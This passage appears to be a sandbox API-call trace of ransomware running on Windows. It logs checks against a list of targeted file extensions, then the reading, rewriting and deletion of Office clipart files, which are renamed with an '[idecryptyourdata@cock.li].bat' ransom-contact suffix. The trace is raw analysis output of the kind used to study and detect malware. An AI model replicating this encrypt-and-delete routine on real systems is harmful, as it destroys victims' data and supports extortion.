Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 68 [0183.300] lstrlenW (lpString=".1cd") returned 4 [0183.300] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 68 [0183.300] lstrlenW (lpString=".jpg") returned 4 [0183.300] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 68 [0183.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 68 [0183.300] lstrlenW (lpString=".doc") returned 4 [0183.300] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.300] lstrlenW (lpString=".docx") returned 5 [0183.300] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0183.300] lstrlenW (lpString=".pdf") returned 4 [0183.300] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.300] lstrlenW (lpString=".xls") returned 4 [0183.300] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.300] lstrlenW (lpString=".xlsx") returned 5 [0183.300] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0183.300] lstrlenW (lpString=".ppt") returned 4 [0183.300] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 68 [0183.301] lstrlenW (lpString=".zip") returned 4 [0183.301] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.301] lstrlenW (lpString=".rar") returned 4 [0183.301] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.301] lstrlenW (lpString=".bz2") returned 4 [0183.301] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.301] lstrlenW (lpString=".7z") returned 3 [0183.301] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 68 [0183.301] lstrlenW (lpString=".dbf") returned 4 [0183.301] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 68 [0183.301] lstrlenW (lpString=".1cd") returned 4 [0183.301] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107328.WMF") returned 68 [0183.301] lstrlenW (lpString=".jpg") returned 4 [0183.301] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.301] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.301] lstrlenW (lpString="J0107342.WMF") returned 12 [0183.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107342.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0183.302] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=4244) returned 1 [0183.302] CloseHandle (hObject=0x360) returned 1 [0183.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107342.wmf")) returned 0x220 [0183.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107342.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107342.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0183.302] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.303] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107342.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0183.303] GetLastError () returned 0x0 [0183.303] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1094, lpOverlapped=0x0) returned 1 [0184.170] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x10a0, lpOverlapped=0x0) returned 1 [0184.171] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0184.172] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0184.172] SetEndOfFile (hFile=0x368) returned 1 [0184.172] CloseHandle (hObject=0x368) returned 1 [0184.172] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.172] SetEndOfFile (hFile=0x360) returned 1 [0184.173] CloseHandle (hObject=0x360) returned 1 [0184.173] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.173] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107342.wmf")) returned 1 [0184.173] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 68 [0184.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 68 [0184.174] lstrlenW (lpString=".doc") returned 4 [0184.174] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.174] lstrlenW (lpString=".docx") returned 5 [0184.174] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.174] lstrlenW (lpString=".pdf") returned 4 [0184.174] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.174] lstrlenW (lpString=".xls") returned 4 [0184.174] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.174] lstrlenW (lpString=".xlsx") returned 5 [0184.174] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.174] lstrlenW (lpString=".ppt") returned 4 [0184.174] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 68 [0184.174] lstrlenW (lpString=".zip") returned 4 [0184.174] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.174] lstrlenW (lpString=".rar") returned 4 [0184.174] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.174] lstrlenW (lpString=".bz2") returned 4 [0184.174] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.174] lstrlenW (lpString=".7z") returned 3 [0184.174] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 68 [0184.174] lstrlenW (lpString=".dbf") returned 4 [0184.174] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 68 [0184.174] lstrlenW (lpString=".1cd") returned 4 [0184.174] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.174] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 68 [0184.174] lstrlenW (lpString=".jpg") returned 4 [0184.175] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 68 [0184.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 68 [0184.175] lstrlenW (lpString=".doc") returned 4 [0184.175] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.175] lstrlenW (lpString=".docx") returned 5 [0184.175] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0184.175] lstrlenW (lpString=".pdf") returned 4 [0184.175] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.175] lstrlenW (lpString=".xls") returned 4 [0184.175] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.175] lstrlenW (lpString=".xlsx") returned 5 [0184.175] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0184.175] lstrlenW (lpString=".ppt") returned 4 [0184.175] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 68 [0184.175] lstrlenW (lpString=".zip") returned 4 [0184.175] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.175] lstrlenW (lpString=".rar") returned 4 [0184.175] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.175] lstrlenW (lpString=".bz2") returned 4 [0184.175] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.175] lstrlenW (lpString=".7z") returned 3 [0184.175] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 68 [0184.175] lstrlenW (lpString=".dbf") returned 4 [0184.175] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.175] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 68 [0184.175] lstrlenW (lpString=".1cd") returned 4 [0184.176] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107342.WMF") returned 68 [0184.176] lstrlenW (lpString=".jpg") returned 4 [0184.176] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.176] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.176] lstrlenW (lpString="J0107468.WMF") returned 12 [0184.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107468.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.177] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=9612) returned 1 [0184.177] CloseHandle (hObject=0x360) returned 1 [0184.177] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107468.wmf")) returned 0x220 [0184.177] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107468.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107468.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.177] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.177] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107468.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0184.178] GetLastError () returned 0x0 [0184.178] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x258c, lpOverlapped=0x0) returned 1 [0184.180] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2590, lpOverlapped=0x0) returned 1 [0184.181] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0184.181] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0184.182] SetEndOfFile (hFile=0x368) returned 1 [0184.182] CloseHandle (hObject=0x368) returned 1 [0184.182] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.182] SetEndOfFile (hFile=0x360) returned 1 [0184.183] CloseHandle (hObject=0x360) returned 1 [0184.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.183] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107468.wmf")) returned 1 [0184.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 68 [0184.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 68 [0184.183] lstrlenW (lpString=".doc") returned 4 [0184.183] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.184] lstrlenW (lpString=".docx") returned 5 [0184.184] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.184] lstrlenW (lpString=".pdf") returned 4 [0184.184] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.184] lstrlenW (lpString=".xls") returned 4 [0184.184] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.184] lstrlenW (lpString=".xlsx") returned 5 [0184.184] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.184] lstrlenW (lpString=".ppt") returned 4 [0184.184] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 68 [0184.184] lstrlenW (lpString=".zip") returned 4 [0184.184] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.184] lstrlenW (lpString=".rar") returned 4 [0184.184] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.184] lstrlenW (lpString=".bz2") returned 4 [0184.184] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.184] lstrlenW (lpString=".7z") returned 3 [0184.184] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 68 [0184.184] lstrlenW (lpString=".dbf") returned 4 [0184.184] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 68 [0184.184] lstrlenW (lpString=".1cd") returned 4 [0184.184] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 68 [0184.184] lstrlenW (lpString=".jpg") returned 4 [0184.184] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 68 [0184.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 68 [0184.185] lstrlenW (lpString=".doc") returned 4 [0184.185] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.185] lstrlenW (lpString=".docx") returned 5 [0184.185] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0184.185] lstrlenW (lpString=".pdf") returned 4 [0184.185] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.185] lstrlenW (lpString=".xls") returned 4 [0184.185] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.185] lstrlenW (lpString=".xlsx") returned 5 [0184.185] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0184.185] lstrlenW (lpString=".ppt") returned 4 [0184.185] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 68 [0184.185] lstrlenW (lpString=".zip") returned 4 [0184.185] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.185] lstrlenW (lpString=".rar") returned 4 [0184.185] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.185] lstrlenW (lpString=".bz2") returned 4 [0184.185] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.185] lstrlenW (lpString=".7z") returned 3 [0184.185] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 68 [0184.185] lstrlenW (lpString=".dbf") returned 4 [0184.185] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 68 [0184.185] lstrlenW (lpString=".1cd") returned 4 [0184.185] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107468.WMF") returned 68 [0184.186] lstrlenW (lpString=".jpg") returned 4 [0184.186] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.186] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0184.186] lstrlenW (lpString="J0107480.WMF") returned 12 [0184.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107480.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.186] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=6024) returned 1 [0184.186] CloseHandle (hObject=0x360) returned 1 [0184.187] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107480.wmf")) returned 0x220 [0184.187] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107480.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107480.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0184.187] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.187] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107480.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0184.188] GetLastError () returned 0x0 [0184.188] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1788, lpOverlapped=0x0) returned 1 [0184.190] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1790, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1790, lpOverlapped=0x0) returned 1 [0184.191] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0184.191] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0184.191] SetEndOfFile (hFile=0x368) returned 1 [0184.191] CloseHandle (hObject=0x368) returned 1 [0184.191] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.191] SetEndOfFile (hFile=0x360) returned 1 [0184.192] CloseHandle (hObject=0x360) returned 1 [0184.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0184.193] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107480.wmf")) returned 1 [0184.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 68 [0184.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 68 [0184.193] lstrlenW (lpString=".doc") returned 4 [0184.193] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0184.193] lstrlenW (lpString=".docx") returned 5 [0184.193] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0184.193] lstrlenW (lpString=".pdf") returned 4 [0184.193] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0184.193] lstrlenW (lpString=".xls") returned 4 [0184.193] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0184.193] lstrlenW (lpString=".xlsx") returned 5 [0184.193] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0184.193] lstrlenW (lpString=".ppt") returned 4 [0184.193] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0184.193] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 68 [0184.193] lstrlenW (lpString=".zip") returned 4 [0184.194] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0184.194] lstrlenW (lpString=".rar") returned 4 [0184.194] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0184.194] lstrlenW (lpString=".bz2") returned 4 [0184.194] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0184.194] lstrlenW (lpString=".7z") returned 3 [0184.194] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0184.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 68 [0184.194] lstrlenW (lpString=".dbf") returned 4 [0184.194] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0184.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 68 [0184.194] lstrlenW (lpString=".1cd") returned 4 [0184.194] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0184.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107480.WMF") returned 68 [0184.194] lstrlenW (lpString=".jpg") returned 4 [0184.194] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0184.194] lstrlenW (lpString="C:\\Program Files\\Microsoft 